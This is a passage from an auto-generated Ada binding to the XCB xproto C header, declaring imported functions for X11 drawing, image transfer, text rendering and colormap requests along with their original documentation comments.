plane-mask, -- * fill-style, subwindow-mode, clip-x-origin, clip-y-origin, and clip-mask. -- * \n -- * The following graphics context mode-dependent components are used: -- * foreground, background, tile, stipple, tile-stipple-x-origin, and -- * tile-stipple-y-origin. -- * @param rectangles_len The number of `xcb_rectangle_t` structures in \a rectangles. -- * @param rectangles The rectangles to fill. -- * @return A cookie -- * -- * Fills the specified rectangle(s) in the order listed in the array. For any -- * given rectangle, each pixel is not drawn more than once. If rectangles -- * intersect, the intersecting pixels are drawn multiple times. -- * -- * This form can be used only if the request will not cause -- * a reply to be generated. Any returned error will be -- * saved for handling by xcb_request_check(). -- function xcb_poly_fill_rectangle_checked (c : access xcb.xcb_connection_t; drawable : xcb_drawable_t; gc : xcb_gcontext_t; rectangles_len : bits_stdint_uintn_h.uint32_t; rectangles : access constant xcb_rectangle_t) return xcb.xcb_void_cookie_t -- /usr/include/xcb/xproto.h:10090 with Import => True, Convention => C, External_Name => "xcb_poly_fill_rectangle_checked"; --* -- * @brief Fills rectangles -- * -- * @param c The connection -- * @param drawable The drawable (Window or Pixmap) to draw on. -- * @param gc The graphics context to use. -- * \n -- * The following graphics context components are used: function, plane-mask, -- * fill-style, subwindow-mode, clip-x-origin, clip-y-origin, and clip-mask. -- * \n -- * The following graphics context mode-dependent components are used: -- * foreground, background, tile, stipple, tile-stipple-x-origin, and -- * tile-stipple-y-origin. -- * @param rectangles_len The number of `xcb_rectangle_t` structures in \a rectangles. -- * @param rectangles The rectangles to fill. -- * @return A cookie -- * -- * Fills the specified rectangle(s) in the order listed in the array. For any -- * given rectangle, each pixel is not drawn more than once. If rectangles -- * intersect, the intersecting pixels are drawn multiple times. -- * -- function xcb_poly_fill_rectangle (c : access xcb.xcb_connection_t; drawable : xcb_drawable_t; gc : xcb_gcontext_t; rectangles_len : bits_stdint_uintn_h.uint32_t; rectangles : access constant xcb_rectangle_t) return xcb.xcb_void_cookie_t -- /usr/include/xcb/xproto.h:10119 with Import => True, Convention => C, External_Name => "xcb_poly_fill_rectangle"; function xcb_poly_fill_rectangle_rectangles (R : access constant xcb_poly_fill_rectangle_request_t) return access xcb_rectangle_t -- /usr/include/xcb/xproto.h:10126 with Import => True, Convention => C, External_Name => "xcb_poly_fill_rectangle_rectangles"; function xcb_poly_fill_rectangle_rectangles_length (R : access constant xcb_poly_fill_rectangle_request_t) return int -- /usr/include/xcb/xproto.h:10129 with Import => True, Convention => C, External_Name => "xcb_poly_fill_rectangle_rectangles_length"; function xcb_poly_fill_rectangle_rectangles_iterator (R : access constant xcb_poly_fill_rectangle_request_t) return xcb_rectangle_iterator_t -- /usr/include/xcb/xproto.h:10132 with Import => True, Convention => C, External_Name => "xcb_poly_fill_rectangle_rectangles_iterator"; function xcb_poly_fill_arc_sizeof (u_buffer : System.Address; arcs_len : bits_stdint_uintn_h.uint32_t) return int -- /usr/include/xcb/xproto.h:10135 with Import => True, Convention => C, External_Name => "xcb_poly_fill_arc_sizeof"; --* -- * -- * @param c The connection -- * @return A cookie -- * -- * Delivers a request to the X server. -- * -- * This form can be used only if the request will not cause -- * a reply to be generated. Any returned error will be -- * saved for handling by xcb_request_check(). -- function xcb_poly_fill_arc_checked (c : access xcb.xcb_connection_t; drawable : xcb_drawable_t; gc : xcb_gcontext_t; arcs_len : bits_stdint_uintn_h.uint32_t; arcs : access constant xcb_arc_t) return xcb.xcb_void_cookie_t -- /usr/include/xcb/xproto.h:10150 with Import => True, Convention => C, External_Name => "xcb_poly_fill_arc_checked"; --* -- * -- * @param c The connection -- * @return A cookie -- * -- * Delivers a request to the X server. -- * -- function xcb_poly_fill_arc (c : access xcb.xcb_connection_t; drawable : xcb_drawable_t; gc : xcb_gcontext_t; arcs_len : bits_stdint_uintn_h.uint32_t; arcs : access constant xcb_arc_t) return xcb.xcb_void_cookie_t -- /usr/include/xcb/xproto.h:10165 with Import => True, Convention => C, External_Name => "xcb_poly_fill_arc"; function xcb_poly_fill_arc_arcs (R : access constant xcb_poly_fill_arc_request_t) return access xcb_arc_t -- /usr/include/xcb/xproto.h:10172 with Import => True, Convention => C, External_Name => "xcb_poly_fill_arc_arcs"; function xcb_poly_fill_arc_arcs_length (R : access constant xcb_poly_fill_arc_request_t) return int -- /usr/include/xcb/xproto.h:10175 with Import => True, Convention => C, External_Name => "xcb_poly_fill_arc_arcs_length"; function xcb_poly_fill_arc_arcs_iterator (R : access constant xcb_poly_fill_arc_request_t) return xcb_arc_iterator_t -- /usr/include/xcb/xproto.h:10178 with Import => True, Convention => C, External_Name => "xcb_poly_fill_arc_arcs_iterator"; function xcb_put_image_sizeof (u_buffer : System.Address; data_len : bits_stdint_uintn_h.uint32_t) return int -- /usr/include/xcb/xproto.h:10181 with Import => True, Convention => C, External_Name => "xcb_put_image_sizeof"; --* -- * -- * @param c The connection -- * @return A cookie -- * -- * Delivers a request to the X server. -- * -- * This form can be used only if the request will not cause -- * a reply to be generated. Any returned error will be -- * saved for handling by xcb_request_check(). -- function xcb_put_image_checked (c : access xcb.xcb_connection_t; format : bits_stdint_uintn_h.uint8_t; drawable : xcb_drawable_t; gc : xcb_gcontext_t; width : bits_stdint_uintn_h.uint16_t; height : bits_stdint_uintn_h.uint16_t; dst_x : bits_stdint_intn_h.int16_t; dst_y : bits_stdint_intn_h.int16_t; left_pad : bits_stdint_uintn_h.uint8_t; depth : bits_stdint_uintn_h.uint8_t; data_len : bits_stdint_uintn_h.uint32_t; data : access Interfaces.Unsigned_8) return xcb.xcb_void_cookie_t -- /usr/include/xcb/xproto.h:10196 with Import => True, Convention => C, External_Name => "xcb_put_image_checked"; --* -- * -- * @param c The connection -- * @return A cookie -- * -- * Delivers a request to the X server. -- * -- function xcb_put_image (c : access xcb.xcb_connection_t; format : bits_stdint_uintn_h.uint8_t; drawable : xcb_drawable_t; gc : xcb_gcontext_t; width : bits_stdint_uintn_h.uint16_t; height : bits_stdint_uintn_h.uint16_t; dst_x : bits_stdint_intn_h.int16_t; dst_y : bits_stdint_intn_h.int16_t; left_pad : bits_stdint_uintn_h.uint8_t; depth : bits_stdint_uintn_h.uint8_t; data_len : bits_stdint_uintn_h.uint32_t; data : access Interfaces.Unsigned_8) return xcb.xcb_void_cookie_t -- /usr/include/xcb/xproto.h:10218 with Import => True, Convention => C, External_Name => "xcb_put_image"; function xcb_put_image_data (R : access constant xcb_put_image_request_t) return access bits_stdint_uintn_h.uint8_t -- /usr/include/xcb/xproto.h:10232 with Import => True, Convention => C, External_Name => "xcb_put_image_data"; function xcb_put_image_data_length (R : access constant xcb_put_image_request_t) return int -- /usr/include/xcb/xproto.h:10235 with Import => True, Convention => C, External_Name => "xcb_put_image_data_length"; function xcb_put_image_data_end (R : access constant xcb_put_image_request_t) return xcb.xcb_generic_iterator_t -- /usr/include/xcb/xproto.h:10238 with Import => True, Convention => C, External_Name => "xcb_put_image_data_end"; function xcb_get_image_sizeof (u_buffer : System.Address) return int -- /usr/include/xcb/xproto.h:10241 with Import => True, Convention => C, External_Name => "xcb_get_image_sizeof"; --* -- * -- * @param c The connection -- * @return A cookie -- * -- * Delivers a request to the X server. -- * -- function xcb_get_image (c : access xcb.xcb_connection_t; format : bits_stdint_uintn_h.uint8_t; drawable : xcb_drawable_t; x : bits_stdint_intn_h.int16_t; y : bits_stdint_intn_h.int16_t; width : bits_stdint_uintn_h.uint16_t; height : bits_stdint_uintn_h.uint16_t; plane_mask : bits_stdint_uintn_h.uint32_t) return xcb_get_image_cookie_t -- /usr/include/xcb/xproto.h:10252 with Import => True, Convention => C, External_Name => "xcb_get_image"; --* -- * -- * @param c The connection -- * @return A cookie -- * -- * Delivers a request to the X server. -- * -- * This form can be used only if the request will cause -- * a reply to be generated. Any returned error will be -- * placed in the event queue. -- function xcb_get_image_unchecked (c : access xcb.xcb_connection_t; format : bits_stdint_uintn_h.uint8_t; drawable : xcb_drawable_t; x : bits_stdint_intn_h.int16_t; y : bits_stdint_intn_h.int16_t; width : bits_stdint_uintn_h.uint16_t; height : bits_stdint_uintn_h.uint16_t; plane_mask : bits_stdint_uintn_h.uint32_t) return xcb_get_image_cookie_t -- /usr/include/xcb/xproto.h:10273 with Import => True, Convention => C, External_Name => "xcb_get_image_unchecked"; function xcb_get_image_data (R : access constant xcb_get_image_reply_t) return access bits_stdint_uintn_h.uint8_t -- /usr/include/xcb/xproto.h:10283 with Import => True, Convention => C, External_Name => "xcb_get_image_data"; function xcb_get_image_data_length (R : access constant xcb_get_image_reply_t) return int -- /usr/include/xcb/xproto.h:10286 with Import => True, Convention => C, External_Name => "xcb_get_image_data_length"; function xcb_get_image_data_end (R : access constant xcb_get_image_reply_t) return xcb.xcb_generic_iterator_t -- /usr/include/xcb/xproto.h:10289 with Import => True, Convention => C, External_Name => "xcb_get_image_data_end"; --* -- * Return the reply -- * @param c The connection -- * @param cookie The cookie -- * @param e The xcb_generic_error_t supplied -- * -- * Returns the reply of the request asked by -- * -- * The parameter @p e supplied to this function must be NULL if -- * xcb_get_image_unchecked(). is used. -- * Otherwise, it stores the error if any. -- * -- * The returned value must be freed by the caller using free(). -- function xcb_get_image_reply (c : access xcb.xcb_connection_t; cookie : xcb_get_image_cookie_t; e : System.Address) return access xcb_get_image_reply_t -- /usr/include/xcb/xproto.h:10306 with Import => True, Convention => C, External_Name => "xcb_get_image_reply"; --*< function xcb_poly_text_8_sizeof (u_buffer : System.Address; items_len : bits_stdint_uintn_h.uint32_t) return int -- /usr/include/xcb/xproto.h:10311 with Import => True, Convention => C, External_Name => "xcb_poly_text_8_sizeof"; --* -- * -- * @param c The connection -- * @return A cookie -- * -- * Delivers a request to the X server. -- * -- * This form can be used only if the request will not cause -- * a reply to be generated. Any returned error will be -- * saved for handling by xcb_request_check(). -- function xcb_poly_text_8_checked (c : access xcb.xcb_connection_t; drawable : xcb_drawable_t; gc : xcb_gcontext_t; x : bits_stdint_intn_h.int16_t; y : bits_stdint_intn_h.int16_t; items_len : bits_stdint_uintn_h.uint32_t; items : access bits_stdint_uintn_h.uint8_t) return xcb.xcb_void_cookie_t -- /usr/include/xcb/xproto.h:10326 with Import => True, Convention => C, External_Name => "xcb_poly_text_8_checked"; --* -- * -- * @param c The connection -- * @return A cookie -- * -- * Delivers a request to the X server. -- * -- function xcb_poly_text_8 (c : access xcb.xcb_connection_t; drawable : xcb_drawable_t; gc : xcb_gcontext_t; x : bits_stdint_intn_h.int16_t; y : bits_stdint_intn_h.int16_t; items_len : bits_stdint_uintn_h.uint32_t; items : access bits_stdint_uintn_h.uint8_t) return xcb.xcb_void_cookie_t -- /usr/include/xcb/xproto.h:10343 with Import => True, Convention => C, External_Name => "xcb_poly_text_8"; function xcb_poly_text_8_items (R : access constant xcb_poly_text_8_request_t) return access bits_stdint_uintn_h.uint8_t -- /usr/include/xcb/xproto.h:10352 with Import => True, Convention => C, External_Name => "xcb_poly_text_8_items"; function xcb_poly_text_8_items_length (R : access constant xcb_poly_text_8_request_t) return int -- /usr/include/xcb/xproto.h:10355 with Import => True, Convention => C, External_Name => "xcb_poly_text_8_items_length"; function xcb_poly_text_8_items_end (R : access constant xcb_poly_text_8_request_t) return xcb.xcb_generic_iterator_t -- /usr/include/xcb/xproto.h:10358 with Import => True, Convention => C, External_Name => "xcb_poly_text_8_items_end"; function xcb_poly_text_16_sizeof (u_buffer : System.Address; items_len : bits_stdint_uintn_h.uint32_t) return int -- /usr/include/xcb/xproto.h:10361 with Import => True, Convention => C, External_Name => "xcb_poly_text_16_sizeof"; --* -- * -- * @param c The connection -- * @return A cookie -- * -- * Delivers a request to the X server. -- * -- * This form can be used only if the request will not cause -- * a reply to be generated. Any returned error will be -- * saved for handling by xcb_request_check(). -- function xcb_poly_text_16_checked (c : access xcb.xcb_connection_t; drawable : xcb_drawable_t; gc : xcb_gcontext_t; x : bits_stdint_intn_h.int16_t; y : bits_stdint_intn_h.int16_t; items_len : bits_stdint_uintn_h.uint32_t; items : access bits_stdint_uintn_h.uint8_t) return xcb.xcb_void_cookie_t -- /usr/include/xcb/xproto.h:10376 with Import => True, Convention => C, External_Name => "xcb_poly_text_16_checked"; --* -- * -- * @param c The connection -- * @return A cookie -- * -- * Delivers a request to the X server. -- * -- function xcb_poly_text_16 (c : access xcb.xcb_connection_t; drawable : xcb_drawable_t; gc : xcb_gcontext_t; x : bits_stdint_intn_h.int16_t; y : bits_stdint_intn_h.int16_t; items_len : bits_stdint_uintn_h.uint32_t; items : access bits_stdint_uintn_h.uint8_t) return xcb.xcb_void_cookie_t -- /usr/include/xcb/xproto.h:10393 with Import => True, Convention => C, External_Name => "xcb_poly_text_16"; function xcb_poly_text_16_items (R : access constant xcb_poly_text_16_request_t) return access bits_stdint_uintn_h.uint8_t -- /usr/include/xcb/xproto.h:10402 with Import => True, Convention => C, External_Name => "xcb_poly_text_16_items"; function xcb_poly_text_16_items_length (R : access constant xcb_poly_text_16_request_t) return int -- /usr/include/xcb/xproto.h:10405 with Import => True, Convention => C, External_Name => "xcb_poly_text_16_items_length"; function xcb_poly_text_16_items_end (R : access constant xcb_poly_text_16_request_t) return xcb.xcb_generic_iterator_t -- /usr/include/xcb/xproto.h:10408 with Import => True, Convention => C, External_Name => "xcb_poly_text_16_items_end"; function xcb_image_text_8_sizeof (u_buffer : System.Address) return int -- /usr/include/xcb/xproto.h:10411 with Import => True, Convention => C, External_Name => "xcb_image_text_8_sizeof"; --* -- * @brief Draws text -- * -- * @param c The connection -- * @param string_len The length of the \a string. Note that this parameter limited by 255 due to -- * using 8 bits! -- * @param drawable The drawable (Window or Pixmap) to draw text on. -- * @param gc The graphics context to use. -- * \n -- * The following graphics context components are used: plane-mask, foreground, -- * background, font, subwindow-mode, clip-x-origin, clip-y-origin, and clip-mask. -- * @param x The x coordinate of the first character, relative to the origin of \a drawable. -- * @param y The y coordinate of the first character, relative to the origin of \a drawable. -- * @param string The string to draw. Only the first 255 characters are relevant due to the data -- * type of \a string_len. -- * @return A cookie -- * -- * Fills the destination rectangle with the background pixel from \a gc, then -- * paints the text with the foreground pixel from \a gc. The upper-left corner of -- * the filled rectangle is at [x, y - font-ascent]. The width is overall-width, -- * the height is font-ascent + font-descent. The overall-width, font-ascent and -- * font-descent are as returned by `xcb_query_text_extents` (TODO). -- * -- * Note that using X core fonts is deprecated (but still supported) in favor of -- * client-side rendering using Xft. -- * -- * This form can be used only if the request will not cause -- * a reply to be generated. Any returned error will be -- * saved for handling by xcb_request_check(). -- function xcb_image_text_8_checked (c : access xcb.xcb_connection_t; string_len : bits_stdint_uintn_h.uint8_t; drawable : xcb_drawable_t; gc : xcb_gcontext_t; x : bits_stdint_intn_h.int16_t; y : bits_stdint_intn_h.int16_t; string : Interfaces.C.Strings.chars_ptr) return xcb.xcb_void_cookie_t -- /usr/include/xcb/xproto.h:10444 with Import => True, Convention => C, External_Name => "xcb_image_text_8_checked"; --* -- * @brief Draws text -- * -- * @param c The connection -- * @param string_len The length of the \a string. Note that this parameter limited by 255 due to -- * using 8 bits! -- * @param drawable The drawable (Window or Pixmap) to draw text on. -- * @param gc The graphics context to use. -- * \n -- * The following graphics context components are used: plane-mask, foreground, -- * background, font, subwindow-mode, clip-x-origin, clip-y-origin, and clip-mask. -- * @param x The x coordinate of the first character, relative to the origin of \a drawable. -- * @param y The y coordinate of the first character, relative to the origin of \a drawable. -- * @param string The string to draw. Only the first 255 characters are relevant due to the data -- * type of \a string_len. -- * @return A cookie -- * -- * Fills the destination rectangle with the background pixel from \a gc, then -- * paints the text with the foreground pixel from \a gc. The upper-left corner of -- * the filled rectangle is at [x, y - font-ascent]. The width is overall-width, -- * the height is font-ascent + font-descent. The overall-width, font-ascent and -- * font-descent are as returned by `xcb_query_text_extents` (TODO). -- * -- * Note that using X core fonts is deprecated (but still supported) in favor of -- * client-side rendering using Xft. -- * -- function xcb_image_text_8 (c : access xcb.xcb_connection_t; string_len : bits_stdint_uintn_h.uint8_t; drawable : xcb_drawable_t; gc : xcb_gcontext_t; x : bits_stdint_intn_h.int16_t; y : bits_stdint_intn_h.int16_t; string : Interfaces.C.Strings.chars_ptr) return xcb.xcb_void_cookie_t -- /usr/include/xcb/xproto.h:10480 with Import => True, Convention => C, External_Name => "xcb_image_text_8"; function xcb_image_text_8_string (R : access constant xcb_image_text_8_request_t) return Interfaces.C.Strings.chars_ptr -- /usr/include/xcb/xproto.h:10489 with Import => True, Convention => C, External_Name => "xcb_image_text_8_string"; function xcb_image_text_8_string_length (R : access constant xcb_image_text_8_request_t) return int -- /usr/include/xcb/xproto.h:10492 with Import => True, Convention => C, External_Name => "xcb_image_text_8_string_length"; function xcb_image_text_8_string_end (R : access constant xcb_image_text_8_request_t) return xcb.xcb_generic_iterator_t -- /usr/include/xcb/xproto.h:10495 with Import => True, Convention => C, External_Name => "xcb_image_text_8_string_end"; function xcb_image_text_16_sizeof (u_buffer : System.Address) return int -- /usr/include/xcb/xproto.h:10498 with Import => True, Convention => C, External_Name => "xcb_image_text_16_sizeof"; --* -- * @brief Draws text -- * -- * @param c The connection -- * @param string_len The length of the \a string in characters. Note that this parameter limited by -- * 255 due to using 8 bits! -- * @param drawable The drawable (Window or Pixmap) to draw text on. -- * @param gc The graphics context to use. -- * \n -- * The following graphics context components are used: plane-mask, foreground, -- * background, font, subwindow-mode, clip-x-origin, clip-y-origin, and clip-mask. -- * @param x The x coordinate of the first character, relative to the origin of \a drawable. -- * @param y The y coordinate of the first character, relative to the origin of \a drawable. -- * @param string The string to draw. Only the first 255 characters are relevant due to the data -- * type of \a string_len. Every character uses 2 bytes (hence the 16 in this -- * request's name). -- * @return A cookie -- * -- * Fills the destination rectangle with the background pixel from \a gc, then -- * paints the text with the foreground pixel from \a gc. The upper-left corner of -- * the filled rectangle is at [x, y - font-ascent]. The width is overall-width, -- * the height is font-ascent + font-descent. The overall-width, font-ascent and -- * font-descent are as returned by `xcb_query_text_extents` (TODO). -- * -- * Note that using X core fonts is deprecated (but still supported) in favor of -- * client-side rendering using Xft. -- * -- * This form can be used only if the request will not cause -- * a reply to be generated. Any returned error will be -- * saved for handling by xcb_request_check(). -- function xcb_image_text_16_checked (c : access xcb.xcb_connection_t; string_len : bits_stdint_uintn_h.uint8_t; drawable : xcb_drawable_t; gc : xcb_gcontext_t; x : bits_stdint_intn_h.int16_t; y : bits_stdint_intn_h.int16_t; string : access constant xcb_char2b_t) return xcb.xcb_void_cookie_t -- /usr/include/xcb/xproto.h:10532 with Import => True, Convention => C, External_Name => "xcb_image_text_16_checked"; --* -- * @brief Draws text -- * -- * @param c The connection -- * @param string_len The length of the \a string in characters. Note that this parameter limited by -- * 255 due to using 8 bits! -- * @param drawable The drawable (Window or Pixmap) to draw text on. -- * @param gc The graphics context to use. -- * \n -- * The following graphics context components are used: plane-mask, foreground, -- * background, font, subwindow-mode, clip-x-origin, clip-y-origin, and clip-mask. -- * @param x The x coordinate of the first character, relative to the origin of \a drawable. -- * @param y The y coordinate of the first character, relative to the origin of \a drawable. -- * @param string The string to draw. Only the first 255 characters are relevant due to the data -- * type of \a string_len. Every character uses 2 bytes (hence the 16 in this -- * request's name). -- * @return A cookie -- * -- * Fills the destination rectangle with the background pixel from \a gc, then -- * paints the text with the foreground pixel from \a gc. The upper-left corner of -- * the filled rectangle is at [x, y - font-ascent]. The width is overall-width, -- * the height is font-ascent + font-descent. The overall-width, font-ascent and -- * font-descent are as returned by `xcb_query_text_extents` (TODO). -- * -- * Note that using X core fonts is deprecated (but still supported) in favor of -- * client-side rendering using Xft. -- * -- function xcb_image_text_16 (c : access xcb.xcb_connection_t; string_len : bits_stdint_uintn_h.uint8_t; drawable : xcb_drawable_t; gc : xcb_gcontext_t; x : bits_stdint_intn_h.int16_t; y : bits_stdint_intn_h.int16_t; string : access constant xcb_char2b_t) return xcb.xcb_void_cookie_t -- /usr/include/xcb/xproto.h:10569 with Import => True, Convention => C, External_Name => "xcb_image_text_16"; function xcb_image_text_16_string (R : access constant xcb_image_text_16_request_t) return access xcb_char2b_t -- /usr/include/xcb/xproto.h:10578 with Import => True, Convention => C, External_Name => "xcb_image_text_16_string"; function xcb_image_text_16_string_length (R : access constant xcb_image_text_16_request_t) return int -- /usr/include/xcb/xproto.h:10581 with Import => True, Convention => C, External_Name => "xcb_image_text_16_string_length"; function xcb_image_text_16_string_iterator (R : access constant xcb_image_text_16_request_t) return xcb_char2b_iterator_t -- /usr/include/xcb/xproto.h:10584 with Import => True, Convention => C, External_Name => "xcb_image_text_16_string_iterator"; --* -- * -- * @param c The connection -- * @return A cookie -- * -- * Delivers a request to the X server. -- * -- * This form can be used only if the request will not cause -- * a reply to be generated. Any returned error will be -- * saved for handling by xcb_request_check(). -- function xcb_create_colormap_checked (c : access xcb.xcb_connection_t; alloc : bits_stdint_uintn_h.uint8_t; mid : xcb_colormap_t; window : xcb_window_t; visual : xcb_visualid_t) return xcb.xcb_void_cookie_t -- /usr/include/xcb/xproto.h:10598 with Import => True, Convention => C, External_Name => "xcb_create_colormap_checked"; --* -- * -- * @param c The connection -- * @return A cookie -- * -- * Delivers a request to the X server. -- * -- function xcb_create_colormap (c : access xcb.xcb_connection_t; alloc : bits_stdint_uintn_h.uint8_t; mid : xcb_colormap_t; window : xcb_window_t; visual : xcb_visualid_t) return xcb.xcb_void_cookie_t -- /usr/include/xcb/xproto.h:10613 with Import => True, Convention => C, External_Name => "xcb_create_colormap"; --* -- * -- * @param c The connection -- * @return A cookie -- * -- * Delivers a request to the X server. -- * -- * This form can be used only if the request will not cause -- * a reply to be generated. Any returned error will be -- * saved for handling by xcb_request_check(). -- function xcb_free_colormap_checked (c : access xcb.xcb_connection_t; cmap : xcb_colormap_t) return xcb.xcb_void_cookie_t -- /usr/include/xcb/xproto.h:10631 with Import => True, Convention => C, External_Name => "xcb_free_colormap_checked"; --* -- * -- * @param c The connection -- * @return A cookie -- * -- * Delivers a request to the X server. -- * -- function xcb_free_colormap (c : access xcb.xcb_connection_t; cmap : xcb_colormap_t) return xcb.xcb_void_cookie_t -- /usr/include/xcb/xproto.h:10643 with Import => True, Convention => C, External_Name => "xcb_free_colormap"; --* -- * -- * @param c The connection -- * @return A cookie -- * -- * Delivers a request to the X server. -- * -- * This form can be used only if the request will not cause -- * a reply to be generated. Any returned error will be -- * saved for handling by xcb_request_check(). -- function xcb_copy_colormap_and_free_checked (c : access xcb.xcb_connection_t; mid : xcb_colormap_t; src_cmap : xcb_colormap_t) return xcb.xcb_void_cookie_t -- /usr/include/xcb/xproto.h:10658 with Import => True, Convention => C, External_Name => "xcb_copy_colormap_and_free_checked"; --* -- * -- * @param c The connection -- * @return A cookie -- * -- * Delivers a request to the X server. -- * -- function xcb_copy_colormap_and_free (c : access xcb.xcb_connection_t; mid : xcb_colormap_t; src_cmap : xcb_colormap_t) return xcb.xcb_void_cookie_t -- /usr/include/xcb/xproto.h:10671 with Import => True, Convention => C, External_Name => "xcb_copy_colormap_and_free"; --* -- * -- * @param c The connection -- * @return A cookie -- * -- * Delivers a request to the X server. -- * -- * This form can be used only if the request will not cause -- * a reply to be generated. Any returned error will be -- * saved for handling by xcb_request_check(). -- function xcb_install_colormap_checked (c : access xcb.xcb_connection_t; cmap : xcb_colormap_t) return xcb.xcb_void_cookie_t -- /usr/include/xcb/xproto.h:10687 with Import => True, Convention => C, External_Name => "xcb_install_colormap_checked"; --* -- * -- * @param c The connection -- * @return A cookie -- * -- * Delivers a request to the X server. -- * -- function xcb_install_colormap (c : access xcb.xcb_connection_t; cmap : xcb_colormap_t) return xcb.xcb_void_cookie_t -- /usr/include/xcb/xproto.h:10699 with Import => True, Convention => C, External_Name => "xcb_install_colormap"; --* -- * -- * @param c The connection -- * @return A cookie -- * -- * Delivers a request to the X server. -- * -- * This form can be used only if the request will not cause -- * a reply to be generated. Any returned error will be -- * saved for handling by xcb_request_check(). -- function xcb_uninstall_colormap_checked (c : access xcb.xcb_connection_t; cmap : xcb_colormap_t) return xcb.xcb_void_cookie_t -- /usr/include/xcb/xproto.h:10714 with Import => True, Convention => C, External_Name => "xcb_uninstall_colormap_checked"; --* -- * -- * @param c The connection -- * @return A cookie -- * -- * Delivers a request to the X server. -- * -- function xcb_uninstall_colormap (c : access xcb.xcb_connection_t; cmap : xcb_colormap_t) return xcb.xcb_void_cookie_t -- /usr/include/xcb/xproto.h:10726 with Import => True, Convention => C, External_Name => "xcb_uninstall_colormap"; function xcb_list_installed_colormaps_sizeof (u_buffer : System.Address) return int -- /usr/include/xcb/xproto.h:10730 with Import => True, Convention => C, External_Name => "xcb_list_installed_colormaps_sizeof"; --* -- * -- * @param c The connection -- * @return A cookie -- * -- * Delivers a request to the X server. -- * -- function xcb_list_installed_colormaps (c : access xcb.xcb_connection_t; window : xcb_window_t) return xcb_list_installed_colormaps_cookie_t -- /usr/include/xcb/xproto.h:10741 with Import => True, Convention => C, External_Name => "xcb_list_installed_colormaps"; --* -- * -- * @param c The connection -- * @return A cookie -- * -- * Delivers a request to the X server. -- * -- * This form can be used only if the request will cause -- * a reply to be generated. Any returned error will be -- * placed in the event queue. -- function xcb_list_installed_colormaps_unchecked (c : access xcb.xcb_connection_t; window : xcb_window_t) return xcb_list_installed_colormaps_cookie_t -- /usr/include/xcb/xproto.h:10756 with Import => True, Convention => C, External_Name => "xcb_list_installed_colormaps_unchecked"; function xcb_list_installed_colormaps_cmaps (R : access constant xcb_list_installed_colormaps_reply_t) return access xcb_colormap_t -- /usr/include/xcb/xproto.h:10760 with Import => True, Convention => C, External_Name => "xcb_list_installed_colormaps_cmaps"; function xcb_list_installed_colormaps_cmaps_length (R : access constant xcb_list_installed_colormaps_reply_t) return int -- /usr/include/xcb/xproto.h:10763 with Import => True, Convention => C, External_Name => "xcb_list_installed_colormaps_cmaps_length"; function xcb_list_installed_colormaps_cmaps_end (R : access constant xcb_list_installed_colormaps_reply_t) return xcb.xcb_generic_iterator_t -- /usr/include/xcb/xproto.h:10766 with Import => True, Convention => C, External_Name => "xcb_list_installed_colormaps_cmaps_end"; --* -- * Return the reply -- * @param c The connection -- * @param cookie The cookie -- * @param e The xcb_generic_error_t supplied -- * -- * Returns the reply of the request asked by -- * -- * The parameter @p e supplied to this function must be NULL if -- * xcb_list_installed_colormaps_unchecked(). is used. -- * Otherwise, it stores the error if any. -- * -- * The returned value must be freed by the caller using free(). -- function xcb_list_installed_colormaps_reply (c : access xcb.xcb_connection_t; cookie : xcb_list_installed_colormaps_cookie_t; e : System.Address) return access xcb_list_installed_colormaps_reply_t -- /usr/include/xcb/xproto.h:10783 with Import => True, Convention => C, External_Name => "xcb_list_installed_colormaps_reply"; --*< --* -- * @brief Allocate a color -- * -- * @param c The connection -- * @param cmap TODO -- * @param red The red value of your color. -- * @param green The green value of your color. -- * @param blue The blue value of your color. -- * @return A cookie -- * -- * Allocates a read-only colormap entry corresponding to the closest RGB value -- * supported by the hardware. If you are using TrueColor, you can take a shortcut -- * and directly calculate the color pixel value to avoid the round trip. But, for -- * example, on 16-bit color setups (VNC), you can easily get the closest supported -- * RGB value to the RGB value you are specifying. -- * -- function xcb_alloc_color (c : access xcb.xcb_connection_t; cmap : xcb_colormap_t; red : bits_stdint_uintn_h.uint16_t; green : bits_stdint_uintn_h.uint16_t; blue : bits_stdint_uintn_h.uint16_t) return xcb_alloc_color_cookie_t -- /usr/include/xcb/xproto.h:10805 with Import => True, Convention => C, External_Name => "xcb_alloc_color"; --* -- * @brief Allocate a color -- * -- * @param c The connection -- * @param cmap TODO -- * @param red The red value of your color. -- * @param green The green value of your color. -- * @param blue The blue value of your color. -- * @return A cookie -- * -- * Allocates a read-only colormap entry corresponding to the closest RGB value -- * supported by the hardware. If you are using TrueColor, you can take a shortcut -- * and directly calculate the color pixel value to avoid the round trip. But, for -- * example, on 16-bit color setups (VNC), you can easily get the closest supported -- * RGB value to the RGB value you are specifying. -- * -- * This form can be used only if the request will cause -- * a reply to be generated. Any returned error will be -- * placed in the event queue. -- function xcb_alloc_color_unchecked (c : access xcb.xcb_connection_t; cmap : xcb_colormap_t; red : bits_stdint_uintn_h.uint16_t; green : bits_stdint_uintn_h.uint16_t; blue : bits_stdint_uintn_h.uint16_t) return xcb_alloc_color_cookie_t -- /usr/include/xcb/xproto.h:10832 with Import => True, Convention => C, External_Name => "xcb_alloc_color_unchecked"; --* -- * Return the reply -- * @param c The connection -- * @param cookie The cookie -- * @param e The xcb_generic_error_t supplied -- * -- * Returns the reply of the request asked by -- * -- * The parameter @p e supplied to this function must be NULL if -- * xcb_alloc_color_unchecked(). is used. -- * Otherwise, it stores the error if any. -- * -- * The returned value must be freed by the caller using free(). -- function xcb_alloc_color_reply (c : access xcb.xcb_connection_t; cookie : xcb_alloc_color_cookie_t; e : System.Address) return access xcb_alloc_color_reply_t -- /usr/include/xcb/xproto.h:10853 with Import => True, Convention => C, External_Name => "xcb_alloc_color_reply"; --*< function xcb_alloc_named_color_sizeof (u_buffer : System.Address) return int -- /usr/include/xcb/xproto.h:10858 with Import => True, Convention => C, External_Name => "xcb_alloc_named_color_sizeof"; --* -- * -- * @param c The connection -- * @return A cookie -- * -- * Delivers a request to the X server. -- * -- function xcb_alloc_named_color (c : access xcb.xcb_connection_t; cmap : xcb_colormap_t; name_len : bits_stdint_uintn_h.uint16_t; name : Interfaces.C.Strings.chars_ptr) return xcb_alloc_named_color_cookie_t -- /usr/include/xcb/xproto.h:10869 with Import => True, Convention => C, External_Name => "xcb_alloc_named_color"; --* -- * -- * @param c The connection -- * @return A cookie -- * -- * Delivers a request to the X server. -- * -- * This form can be used only if the request will cause -- * a reply to be generated. Any returned error will be -- * placed in the event queue. -- function xcb_alloc_named_color_unchecked (c : access xcb.xcb_connection_t; cmap : xcb_colormap_t; name_len : bits_stdint_uintn_h.uint16_t; name : Interfaces.C.Strings.chars_ptr) return 